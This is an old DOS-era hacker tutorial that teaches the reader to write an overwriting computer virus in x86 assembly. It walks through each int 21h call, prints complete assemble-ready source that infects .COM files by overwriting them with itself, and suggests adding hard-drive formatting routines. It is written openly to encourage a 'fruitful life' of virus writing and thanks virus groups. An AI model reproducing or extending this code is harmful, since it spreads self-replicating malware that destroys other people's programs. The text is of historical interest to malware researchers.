/\---/\ RATBOY'S OVERWRITING VIRUS TUTORIAL ( . . ) \ / WARNING: The information contain within here can be \ / ^^^^^^^ dangerous to you mind and computer!!!!!!!! \*/ I assume no responsiblity!!!!!!!!! # Well here it is my first instructional tutorial. I felt it was nesscary for this file since I could not find any tutorials that taught virus writing from the basic overwriting virus. Well that's how I started and now I want to show you. So that you too can have a long and fruitful life of codeing viruses. :) OVERWRITING VIRUSES -=What is an overwritting virus? I'm glad you asked that. :) An overwriting virus is a virus that reproduces by overwriting the first parts of a program with itself. Here is an example: +-------------------------+ (I got this example from | P R O G R A M | 40Hex, thanks P/S!!!!) +-------------------------+ plus: +--------+ | VIRUS! | +--------+ equals: +--------+----------------+ | VIRUS! | G R A M | +--------+----------------+ As you can see the first part of the program was overwritten with the virus code. Since important parts of the original program are effectivly destroyed it won't ever run, but the virus code will. As you can guess overwriting viruses are very destructive and not very productive. But you must learn to walk before you can do the Polka!! -=So what does one need to know to write an overwriting virus? Another question I'm glad you asked. :) Well having a basic knowledge in Assembly is a must, but it is not very differcult. As a virus writer, I only know one programing language, Assembly. I didn't even learn BASIC. So don't listen to those that say don't learn Assembly, it's a wonderful programing language. At the end of this file I'll be recomending books and things to do to help ya on your way to Assembly and virus writing. Well let's get down to codeing!!!! :) We will be dealing with .Com files. So here is the basic setup for a .Com file in an Assembly source file: ----------------------------------------------------------------------------- CODE SEGMENT ASSUME CS:CODE,DS:CODE ;in .Com files the data, code, extra ;and stack segments are all the same. ORG 100H ;this is where all .Com files start ;in memory. This allows room for the ;PSP. STARTVX PROC NEAR blah! ;all your virus body goes here blah! blah! STARTVX ENDP blah! ;all your 'db's go here etc..etc... CODE ENDS END STARTVX ----------------------------------------------------------------------------- See the set up isn't really hard to follow, but the lack of info in that example can be confusing. We'll get to a full Virus source code a little later. Now what is the basic setup for a simple overwriting virus? Well let's look at the order of operations: (1) find a file (2) open the found file (3) write the virus to the opened file (infect it) (4) close the file (5) exit Well as you can see there is nothing but pure replication functions in this setup. Well I wanted it to be easy and not to boog you down with encryption, id bytes, etc... We are dealing with ZEN and the art of basic viruses! Here we go looking at these steps of an simple overwriting virus: (1) FIND FIRST FILE! the inputs: AH: 4EH CX: FILE ATTRIBUTES DX: OFFSET ADDRESS OF FILE NAME DS: SEGMENT ADDRESS OF FILE NAME Now let's see how we would put this into our little program: mov ah,4eh ;find first service mov cx,0000h ;we 0'ed cx for normal files mov dx,offset star_com ;the file mask for .Com file ;you'll see int 21h ;now of course when you said star_com you need to tell the Assembler what ;you are talking about. Here it is: star_com: db "*.com",0 ;ya see how it will work. With the use of the wild card '*' the first file ;that has the ending of .com will be found. This is easy isn't it? Now you can see that we didn't need to touch DS: since CS=DS=ES=SS. So the Star_com already was in the Data Segment. Yay!!!!! Love em .Com files. Sorry need to get back on track. Now before we can go on and talk about open a found file for writing to(infecting), we must talk about the Disk Transfer Area (DTA). When you find that first file, information about the file found goes into the DTA, everything from file name to date of creation. Here's the setup: 0h db 21 dup(0) ;reserved for DOS uses 15h db 00 ;file attributes 16h dw 0000 ;file time 18h dw 0000 ;file date 1ah dd 00000000 ;file size 1eh db 13 dup(0) ;asciiz of the file name. That is the layout of the DTA. Now the DTA lies in the PSP. The first 256 (100h) bytes infront of the .Com file. It's address is 80h. Most of the time in virus writing, you would want to move the DTA to a location where you can manipulate it without possbile messing up the PSP. Well for our case, with a simple overwriting virus, we don't need to worry. All we are going to do is read from the DTA, the file name we just have found. Now this is how we will address the file name, now we know that the DTA starts at 80h, and we know that at 1eh from the DTA's begining is the asciiz of the file name. So we just add them together and see what we get, 80h + 1eh = 9eh. Well that is were it's located, now let's move on to the next step. (2) OPENING THE FOUND FILE! the inputs: AH: 3DH AL: 00H ;opened for reading only 01H ;opened for writing only 02H ;opened for both reading and writing DX: OFFSET ADDRESS OF THE FILE NAME DS: SEGMENT ADDRESS OF THE FILE NAME outputs: AX: FILE HANDLE Now look at it setup in the format we need to know. mov ah,3dh ;open file mov al,02h ;open it for reading and writing mov dx,9eh ;remember this is where the name in the DTA int 21h Now Dos services will return a file handle of the file we just opened. The file handle is nothing more than a number that dos uses to know where it will read from(the file) or write to(the file). We don't want it in AX since the next step that you will see we need it in BX. Here's a easy way to move it: xchg bx,ax ;that will put the file handle into bx in one ;step!!! Ok now the down and dirty stuff. Infecting the file we just opened. Ha ha! (3)WRITING TO THE OPENED FILE(INFECTING) the inputs: AH: 40H BX: FILE HANDLE CX: BYTES TO WRITE DX: OFFSET OF ADDRESS OF THE BEGINING OF THE VIRUS Here we go again with seeing what it will look like: mov ah,40h mov cx,offset endvx - offset startvx ;this will find the virus ;lenth, how many bytes to ;write.... mov dx,offset startvx ;where the virus starts int 21h Ahhhhhhhhh! I always feel so relaxed after reproducing....ahh.hh...h! Oh...where was I, a...well now that we have copied the virus to the file, now we can close it up. (4)CLOSE THE FILE! ;Whata-ya live in a barn! the inputs: AX: 3EH BX: FILE HANDLE Now before we go on remember how after we opened the file that we put the file handle in BX. So since we didn't mess with BX we should just have to: mov ah,3eh int 21h Now for the final and last step the exiting. Here ya go: (5)EXIT! int 20h Well I know it isn't really pretty, but it works. Well let's look at how all of it fits together: ----------------------------------------------------------------------------- Code Segment Assume CS:code,DS:code Org 100h startvx proc near mov ah,4eh mov cx,0000h mov dx,offset star_com int 21h mov ah,3dh mov al,02h mov dx,9eh int 21h xchg bx,ax mov ah,40h mov cx,offset endvx - offset startvx mov dx,offset startvx int 21h mov ah,3eh int 21h int 20h startvx endp star_com: db "*.com",0 endvx label near code ends end startvx ----------------------------------------------------------------------------- Sorry I didn't put comments in, but that was done so that if you can not read along and follow what is going on. You need to re-read this file, and practice more Assembly. -=Now that I know overwriting virus programing what can I use them for? Another fine question. :) Overwriting viruses are simple, and being simple they are fairly easy to follow and program. That in it's self will help educate you in the basics of a virus, writing, reading, find file, etc.... Also since it's fairly easy to write up an overwriting virus you can use them as test platforms for other routines. Formating HD's, visual displays, encryption, etc..... This is so that you can concentrate on the how the test routine will work not the virus. -=Now that I have the basics, is that all I need? OH No, there are many things that you need, the knowledge being the hardest. Read Assembler Inside and Out, and Using Assembly, they're really good books. You need, an Assembler(A86+TASM), lot's of source codes to learn from(some included). It just dosen't stop there, you will need a some really good virus scanners to track what your virus is doing. F-prot and Tbav are great, but if you come up with a virus that is unscannerable they won't work. That's why I highly recommend INVIRCIBLE. It will protect you from real screw ups, track your virus movement, even unscannibles, even protect you from your 'friends' viruses on you computer >:>. It's the best anti-virus protection out there, you need to know your enemy, and it's a powerful tool. The biggest and most important thing you can have is people that are helpful enough to take the time to answer the questions that form in your mind. You will see some of those people in the closing credits of this file. Talk to them. Now you are on to a long and fruitful life of making your own viruses. Remember pratice, ask questions, read and of course have fun!!!!!!! ***************************************************************************** Now I would like to take the time to thank a few people: -=*God, for making me possible -=*My Wife, for putting up with me!! -=*FC, thanks for all the info and help, dude!!! -=*Invircible, yea I know it's a piece of software, but it has covered my but enough times. Thanks Mike!!!!!!!!!!!!!!!!! -=*Aristotle, yea Aristotle, the dude help start me out. -=*Vlad, Immortal Riot, NuKE, Falcon, P/S, Mad Arab, Terminal Velocity..etc..